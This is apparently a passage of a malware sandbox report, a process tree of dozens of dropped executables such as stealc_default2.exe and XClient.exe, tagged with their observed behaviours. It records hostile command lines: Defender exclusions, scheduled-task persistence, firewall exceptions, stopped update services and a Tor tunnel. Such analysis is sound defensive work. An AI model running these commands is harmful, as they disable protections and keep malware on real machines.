        System Location Discovery: System Language Discovery
        
        PID:2188
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1640
        
        C:\Users\Admin\AppData\Local\Temp\197036\Jurisdiction.pif
        
        Jurisdiction.pif T
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2988
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2172
    - - C:\Users\Admin\Desktop\Files\BroadcomRetest.exe
        
        "C:\Users\Admin\Desktop\Files\BroadcomRetest.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2464
    - - C:\Users\Admin\Desktop\Files\tn8cdkzn.exe
        
        "C:\Users\Admin\Desktop\Files\tn8cdkzn.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2172
    - - C:\Users\Admin\Desktop\Files\prem1.exe
        
        "C:\Users\Admin\Desktop\Files\prem1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2824
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2872
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 308
        6⤵
        Program crash
        
        PID:5200
    - - C:\Users\Admin\Desktop\Files\ConsoleApp3.exe
        
        "C:\Users\Admin\Desktop\Files\ConsoleApp3.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5124
    - - C:\Users\Admin\Desktop\Files\GOLD.exe
        
        "C:\Users\Admin\Desktop\Files\GOLD.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5352
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5448
    - - C:\Users\Admin\Desktop\Files\game.exe
        
        "C:\Users\Admin\Desktop\Files\game.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4760
    - - C:\Users\Admin\Desktop\Files\runtime.exe
        
        "C:\Users\Admin\Desktop\Files\runtime.exe"
        5⤵
        Executes dropped EXE
        
        PID:1960
    - - C:\Users\Admin\Desktop\Files\Identification-1.exe
        
        "C:\Users\Admin\Desktop\Files\Identification-1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5608
    - - C:\Users\Admin\Desktop\Files\malware.exe
        
        "C:\Users\Admin\Desktop\Files\malware.exe"
        5⤵
        
        PID:4280
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command Expand-Archive "tor-win32-0.3.4.9.zip" " TorFiles"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K TorFiles\tor\tor.exe --nt-service --HTTPTunnelPort 8118
        6⤵
        
        PID:9012
        
        C:\Users\Admin\Desktop\Files\TorFiles\tor\tor.exe
        
        TorFiles\tor\tor.exe --nt-service --HTTPTunnelPort 8118
        7⤵
        
        PID:8536
    - - C:\Users\Admin\Desktop\Files\Prototype-tcp.exe
        
        "C:\Users\Admin\Desktop\Files\Prototype-tcp.exe"
        5⤵
        
        PID:7240
    - - C:\Users\Admin\Desktop\Files\gawdth.exe
        
        "C:\Users\Admin\Desktop\Files\gawdth.exe"
        5⤵
        
        PID:8064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\1.bat" "
        6⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\clamer.exe
        
        clamer.exe -priverdD
        7⤵
        
        PID:8840
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\lofsawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lofsawd.exe"
        8⤵
        
        PID:9196
    - - C:\Users\Admin\Desktop\Files\clip.exe
        
        "C:\Users\Admin\Desktop\Files\clip.exe"
        5⤵
        
        PID:7536
    - - C:\Users\Admin\Desktop\Files\wow.exe
        
        "C:\Users\Admin\Desktop\Files\wow.exe"
        5⤵
        
        PID:8184
    - - C:\Users\Admin\Desktop\Files\ptihjawdthas.exe
        
        "C:\Users\Admin\Desktop\Files\ptihjawdthas.exe"
        5⤵
        
        PID:7384
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C schtasks /create /tn WinApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        6⤵
        
        PID:8380
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn WinApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7976
    - - C:\Users\Admin\Desktop\Files\systems.exe
        
        "C:\Users\Admin\Desktop\Files\systems.exe"
        5⤵
        
        PID:8420
    - - C:\Users\Admin\Desktop\Files\Launcher.exe
        
        "C:\Users\Admin\Desktop\Files\Launcher.exe"
        5⤵
        
        PID:8616
    - - C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe
        
        "C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe"
        5⤵
        
        PID:7840
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
        6⤵
        
        PID:7192
    - - C:\Users\Admin\Desktop\Files\Session-https.exe
        
        "C:\Users\Admin\Desktop\Files\Session-https.exe"
        5⤵
        
        PID:7968
    - - C:\Users\Admin\Desktop\Files\requirements.exe
        
        "C:\Users\Admin\Desktop\Files\requirements.exe"
        5⤵
        
        PID:7332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\requirements.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7704
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'requirements.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:976
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\requirements.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'requirements.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7104
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "requirements" /tr "C:\Users\Admin\AppData\Local\Temp\requirements.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9036
    - - C:\Users\Admin\Desktop\Files\test.exe
        
        "C:\Users\Admin\Desktop\Files\test.exe"
        5⤵
        
        PID:8900
      - C:\Windows\Temp\{B3A4308C-BFAD-4D45-A4BB-87140F5A4D5C}\.cr\test.exe
        
        "C:\Windows\Temp\{B3A4308C-BFAD-4D45-A4BB-87140F5A4D5C}\.cr\test.exe" -burn.clean.room="C:\Users\Admin\Desktop\Files\test.exe" -burn.filehandle.attached=564 -burn.filehandle.self=576
        6⤵
        
        PID:5520
        
        C:\Windows\Temp\{E0F7716E-EFBF-4AE9-89AB-14B29212A2AA}\.ba\DZIPR.exe
        
        "C:\Windows\Temp\{E0F7716E-EFBF-4AE9-89AB-14B29212A2AA}\.ba\DZIPR.exe"
        7⤵
        
        PID:9100
        
        C:\Users\Admin\AppData\Local\DaemonauthQVX_alpha_3\DZIPR.exe
        
        C:\Users\Admin\AppData\Local\DaemonauthQVX_alpha_3\DZIPR.exe
        8⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        9⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        10⤵
        
        PID:7236
    - - C:\Users\Admin\Desktop\Files\Survox.exe
        
        "C:\Users\Admin\Desktop\Files\Survox.exe"
        5⤵
        
        PID:1120
    - - C:\Users\Admin\Desktop\Files\jb4w5s2l.exe
        
        "C:\Users\Admin\Desktop\Files\jb4w5s2l.exe"
        5⤵
        
        PID:7868
      - C:\Users\Admin\Desktop\Files\jb4w5s2l.exe
        
        "C:\Users\Admin\Desktop\Files\jb4w5s2l.exe"
        6⤵
        
        PID:6680
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 328
        6⤵
        Program crash
        
        PID:8316
    - - C:\Users\Admin\Desktop\Files\ps.exe
        
        "C:\Users\Admin\Desktop\Files\ps.exe"
        5⤵
        
        PID:8348
    - - C:\Users\Admin\Desktop\Files\blackload.exe
        
        "C:\Users\Admin\Desktop\Files\blackload.exe"
        5⤵
        
        PID:9292
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        
        PID:10184
    - - C:\Users\Admin\Desktop\Files\VidsUsername.exe
        
        "C:\Users\Admin\Desktop\Files\VidsUsername.exe"
        5⤵
        
        PID:1900
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c move Recreation Recreation.bat & Recreation.bat
        6⤵
        
        PID:7496
    - - C:\Users\Admin\Desktop\Files\Server1.exe
        
        "C:\Users\Admin\Desktop\Files\Server1.exe"
        5⤵
        
        PID:9632
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\Server1.exe" "Server1.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:7576
    - - C:\Users\Admin\Desktop\Files\WindowsUI.exe
        
        "C:\Users\Admin\Desktop\Files\WindowsUI.exe"
        5⤵
        
        PID:9560
    - - C:\Users\Admin\Desktop\Files\AdaptorOvernight.exe
        
        "C:\Users\Admin\Desktop\Files\AdaptorOvernight.exe"
        5⤵
        
        PID:4232
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit
        6⤵
        
        PID:4128
    - - C:\Users\Admin\Desktop\Files\tpeinf.exe
        
        "C:\Users\Admin\Desktop\Files\tpeinf.exe"
        5⤵
        
        PID:5912
    - - C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe
        
        "C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe"
        5⤵
        
        PID:4712
      - C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe
        
        "C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe"
        6⤵
        
        PID:7908
    - - C:\Users\Admin\Desktop\Files\univ.exe
        
        "C:\Users\Admin\Desktop\Files\univ.exe"
        5⤵
        
        PID:9308
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9308 -s 772
        6⤵
        Program crash
        
        PID:7476
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9308 -s 780
        6⤵
        Program crash
        
        PID:1180
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9308 -s 804
        6⤵
        Program crash
        
        PID:3796
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9308 -s 792
        6⤵
        Program crash
        
        PID:12064
    - - C:\Users\Admin\Desktop\Files\gdn5yfjd.exe
        
        "C:\Users\Admin\Desktop\Files\gdn5yfjd.exe"
        5⤵
        
        PID:6296
    - - C:\Users\Admin\Desktop\Files\12.exe
        
        "C:\Users\Admin\Desktop\Files\12.exe"
        5⤵
        
        PID:10708
    - - C:\Users\Admin\Desktop\Files\buildred.exe
        
        "C:\Users\Admin\Desktop\Files\buildred.exe"
        5⤵
        
        PID:5568
    - - C:\Users\Admin\Desktop\Files\keygen.exe
        
        "C:\Users\Admin\Desktop\Files\keygen.exe"
        5⤵
        
        PID:11028
    - - C:\Users\Admin\Desktop\Files\OneDrive.exe
        
        "C:\Users\Admin\Desktop\Files\OneDrive.exe"
        5⤵
        
        PID:9132
    - - C:\Users\Admin\Desktop\Files\T3.exe
        
        "C:\Users\Admin\Desktop\Files\T3.exe"
        5⤵
        
        PID:11728
    - - C:\Users\Admin\Desktop\Files\AA_v3.exe
        
        "C:\Users\Admin\Desktop\Files\AA_v3.exe"
        5⤵
        
        PID:12144
    - - C:\Users\Admin\Desktop\Files\scheduledllama.exe
        
        "C:\Users\Admin\Desktop\Files\scheduledllama.exe"
        5⤵
        
        PID:3512
    - - C:\Users\Admin\Desktop\Files\Fast%20Download.exe
        
        "C:\Users\Admin\Desktop\Files\Fast%20Download.exe"
        5⤵
        
        PID:11328
    - - C:\Users\Admin\Desktop\Files\Office.exe
        
        "C:\Users\Admin\Desktop\Files\Office.exe"
        5⤵
        
        PID:6148
    - - C:\Users\Admin\Desktop\Files\crazyCore.exe
        
        "C:\Users\Admin\Desktop\Files\crazyCore.exe"
        5⤵
        
        PID:12228
    - - C:\Users\Admin\Desktop\Files\sunset1.exe
        
        "C:\Users\Admin\Desktop\Files\sunset1.exe"
        5⤵
        
        PID:920
    - - C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe
        
        "C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
        5⤵
        
        PID:11448
      - C:\Users\Admin\AppData\Local\Temp\is-5QL40.tmp\SrbijaSetupHokej.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5QL40.tmp\SrbijaSetupHokej.tmp" /SL5="$A0200,3939740,937984,C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
        6⤵
        
        PID:11476
    - - C:\Users\Admin\Desktop\Files\InfluencedNervous.exe
        
        "C:\Users\Admin\Desktop\Files\InfluencedNervous.exe"
        5⤵
        
        PID:9492
    - - C:\Users\Admin\Desktop\Files\23c2343.exe
        
        "C:\Users\Admin\Desktop\Files\23c2343.exe"
        5⤵
        
        PID:10656
    - - C:\Users\Admin\Desktop\Files\t.exe
        
        "C:\Users\Admin\Desktop\Files\t.exe"
        5⤵
        
        PID:11996
    - - C:\Users\Admin\Desktop\Files\a.exe
        
        "C:\Users\Admin\Desktop\Files\a.exe"
        5⤵
        
        PID:8944
    - - C:\Users\Admin\Desktop\Files\bin.exe
        
        "C:\Users\Admin\Desktop\Files\bin.exe"
        5⤵
        
        PID:1580
    - - C:\Users\Admin\Desktop\Files\NoMoreRansom.exe
        
        "C:\Users\Admin\Desktop\Files\NoMoreRansom.exe"
        5⤵
        
        PID:7972
    - - C:\Users\Admin\Desktop\Files\stealc_default2.exe
        
        "C:\Users\Admin\Desktop\Files\stealc_default2.exe"
        5⤵
        
        PID:6244
    - - C:\Users\Admin\Desktop\Files\4ck3rr.exe
        
        "C:\Users\Admin\Desktop\Files\4ck3rr.exe"
        5⤵
        
        PID:8508
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8704 -childID 7 -isForBrowser -prefsHandle 9056 -prefMapHandle 5336 -prefsLen 30980 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8d72141-3711-48ed-be00-d90e18be5715} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:3784
  - - C:\Users\Admin\Desktop\Files\ENP.exe
      "C:\Users\Admin\Desktop\Files\ENP.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3520
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8744 -childID 8 -isForBrowser -prefsHandle 7952 -prefMapHandle 8972 -prefsLen 30980 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4376c570-fdb2-442e-86a7-4b2786b6a8f7} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:5716
  - - C:\Users\Admin\Desktop\4363463463464363463463463.exe
      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5764
    - - C:\Users\Admin\Desktop\Files\LoadNew.exe
        
        "C:\Users\Admin\Desktop\Files\LoadNew.exe"
        5⤵
        Executes dropped EXE
        
        PID:5272
    - - C:\Users\Admin\Desktop\Files\file1.exe
        
        "C:\Users\Admin\Desktop\Files\file1.exe"
        5⤵
        Executes dropped EXE
        
        PID:5128
    - - C:\Users\Admin\Desktop\Files\reddit.exe
        
        "C:\Users\Admin\Desktop\Files\reddit.exe"
        5⤵
        
        PID:1944
    - - C:\Users\Admin\Desktop\Files\XClient.exe
        
        "C:\Users\Admin\Desktop\Files\XClient.exe"
        5⤵
        
        PID:5792
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6568
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6592
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8788
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7076
    - - C:\Users\Admin\Desktop\Files\cabal.exe
        
        "C:\Users\Admin\Desktop\Files\cabal.exe"
        5⤵
        
        PID:6024
      - C:\Users\Admin\Desktop\Files\update.exe
        
        "C:\Users\Admin\Desktop\Files\update.exe" mmoparadox
        6⤵
        
        PID:9148
    - - C:\Users\Admin\Desktop\Files\o.exe
        
        "C:\Users\Admin\Desktop\Files\o.exe"
        5⤵
        
        PID:5272
      - C:\Windows\sysklnorbcv.exe
        
        C:\Windows\sysklnorbcv.exe
        6⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7132
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        7⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:7056
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:2000
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:5864
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        8⤵
        Launches sc.exe
        
        PID:6512
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        8⤵
        Launches sc.exe
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\111386196.exe
        
        C:\Users\Admin\AppData\Local\Temp\111386196.exe
        7⤵
        
        PID:8304
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:5612
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:6620
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:9160
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\1930126494.exe
        
        C:\Users\Admin\AppData\Local\Temp\1930126494.exe
        7⤵
        
        PID:9120
        
        C:\Users\Admin\AppData\Local\Temp\1284523321.exe
        
        C:\Users\Admin\AppData\Local\Temp\1284523321.exe
        7⤵
        
        PID:5844
        
        C:\Users\Admin\AppData\Local\Temp\1178319434.exe
        
        C:\Users\Admin\AppData\Local\Temp\1178319434.exe
        7⤵
        
        PID:6828
    - - C:\Users\Admin\Desktop\Files\pei.exe
        
        "C:\Users\Admin\Desktop\Files\pei.exe"
        5⤵
        
        PID:4536
      - C:\Users\Admin\AppData\Local\Temp\1452214820.exe
        
        C:\Users\Admin\AppData\Local\Temp\1452214820.exe
        6⤵
        
        PID:6472
        
        C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        7⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Local\Temp\2275516176.exe
        
        C:\Users\Admin\AppData\Local\Temp\2275516176.exe
        8⤵
        
        PID:8204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:9640
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        10⤵
        
        PID:7552
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:7280
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        10⤵
        
        PID:9416
        
        C:\Users\Admin\AppData\Local\Temp\294519892.exe
        
        C:\Users\Admin\AppData\Local\Temp\294519892.exe
        8⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\312966155.exe
        
        C:\Users\Admin\AppData\Local\Temp\312966155.exe
        8⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Local\Temp\191932066.exe
        
        C:\Users\Admin\AppData\Local\Temp\191932066.exe
        8⤵
        
        PID:7900
        
        C:\Users\Admin\AppData\Local\Temp\164016686.exe
        
        C:\Users\Admin\AppData\Local\Temp\164016686.exe
        8⤵
        
        PID:8960
    - - C:\Users\Admin\Desktop\Files\5_6253708004881862888.exe
        
        "C:\Users\Admin\Desktop\Files\5_6253708004881862888.exe"
        5⤵
        
        PID:5768
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:876
    - - C:\Users\Admin\Desktop\Files\Meeting.exe
        
        "C:\Users\Admin\Desktop\Files\Meeting.exe"
        5⤵
        
        PID:6192
    - - C:\Users\Admin\Desktop\Files\jdkashk.exe
        
        "C:\Users\Admin\Desktop\Files\jdkashk.exe"
        5⤵
        
        PID:7224
    - - C:\Users\Admin\Desktop\Files\qNVQKFyM.exe
        
        "C:\Users\Admin\Desktop\Files\qNVQKFyM.exe"
        5⤵
        
        PID:7316
    - - C:\Users\Admin\Desktop\Files\Amogus.exe
        
        "C:\Users\Admin\Desktop\Files\Amogus.exe"
        5⤵
        
        PID:8020
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7792
      - C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        6⤵
        
        PID:9156
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\19FtZJIJh6em.bat" "
        7⤵
        
        PID:9172
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:7868
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8412
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        8⤵
        
        PID:9888
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Tk2AUjymDtDy.bat" "
        9⤵
        
        PID:6992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:8548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:976
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        10⤵
        
        PID:9476
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIvOgXSkB4b4.bat" "
        11⤵
        
        PID:8428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:9904
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8076
        
        C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"
        12⤵
        
        PID:2204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wUwi6edlw5KP.bat" "
        13⤵
        
        PID:8708
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:5348
        
